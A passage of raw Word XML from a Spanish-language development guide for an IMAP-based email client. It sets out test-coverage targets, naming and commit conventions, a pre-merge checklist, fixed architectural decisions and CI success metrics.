        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Routes (handlers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Models / Schemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Composables Vue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Config / Types / Main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Excluido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los PRs que bajan la cobertura global por debajo del 85% son bloqueados por branch protection rules.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="245"/>
    <w:bookmarkStart w:id="246" w:name="schemas-documentados"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.6 Schemas Documentados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Todo schema Mongoose incluye comentarios JSDoc y tipos TypeScript exportados. Los endpoints de la API usan Zod para validación y generación automática de tipos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ✅ CORRECTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Schema de usuario principal. Almacena credenciales locales</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * y cuentas de correo conectadas (IMAP/OAuth2).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UserSchema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Schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">UserDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  username</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unique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index</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passwordHash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// bcrypt(12)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [AccountSchema]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="246"/>
    <w:bookmarkStart w:id="247" w:name="resumen-de-convenciones"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.7 Resumen de Convenciones</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2457"/>
        <w:gridCol w:w="3004"/>
        <w:gridCol w:w="2457"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aspecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Convención</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ejemplo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Nombres de archivos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">kebab-case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">email-list.vue</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">use-auth.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Nombres de componentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PascalCase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">VirtualEmailList.vue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Composables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prefijo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">useEmailStore.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Stores Pinia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sufijo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">emailStore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authStore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">API routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">kebab-case plural</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/emails</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Variables env</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UPPER_SNAKE_CASE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MONGODB_URI</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT_SECRET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Commits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conventional Commits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">feat(imap): add CONDSTORE support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Branches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">feature/&lt;agent&gt;-&lt;desc&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">feature/imap-bridge-condstore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="247"/>
    <w:bookmarkStart w:id="248" w:name="checklist-pre-merge"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.8 Checklist Pre-Merge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de mergear cualquier PR, el agente autor debe verificar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ CI pasa: lint, typecheck, unit tests, integration tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Cobertura de tests &gt;= 85% para archivos modificados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ No hay secretos hardcodeados (verificado con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git grep -i "password\|secret\|token"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Sanitización aplicada a cualquier input HTML</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Credenciales encriptadas antes de persistir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Migrations incluidas si hay cambios en schemas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ Documentación actualizada si hay cambios en API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ E2E tests pasan para flujos afectados</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="248"/>
    <w:bookmarkStart w:id="249" w:name="decisiones-arquitectónicas-inmutables"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.9 Decisiones Arquitectónicas Inmutables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las siguientes decisiones no se revisan sin RFC explícito y aprobación del swarm completo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP como protocolo principal, JMAP como complemento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IMAP es obligatorio para compatibilidad universal. JMAP se añade en Fase 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MongoDB para metadata, SeaweedFS para adjuntos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">No se almacenan archivos binarios en MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Redis para cache y sesiones, no para persistencia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Los datos críticos siempre tienen copia en MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BFF auth pattern.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Access token en memoria del frontend, refresh token en HttpOnly cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Headers-first, body-on-demand.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El sync IMAP nunca descarga cuerpos completos para listados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Server-side sanitization.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DOMPurify/sanitize-html corre en el API, no solo en el cliente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="249"/>
    <w:bookmarkStart w:id="250" w:name="métricas-de-éxito-del-swarm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3.10 Métricas de Éxito del Swarm</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Métrica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Objetivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cómo Medir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tiempo de build CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GitHub Actions elapsed time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tiempo de deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Desde tag push a healthy en prod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cobertura de tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt;= 85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@vitest/coverage-v8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
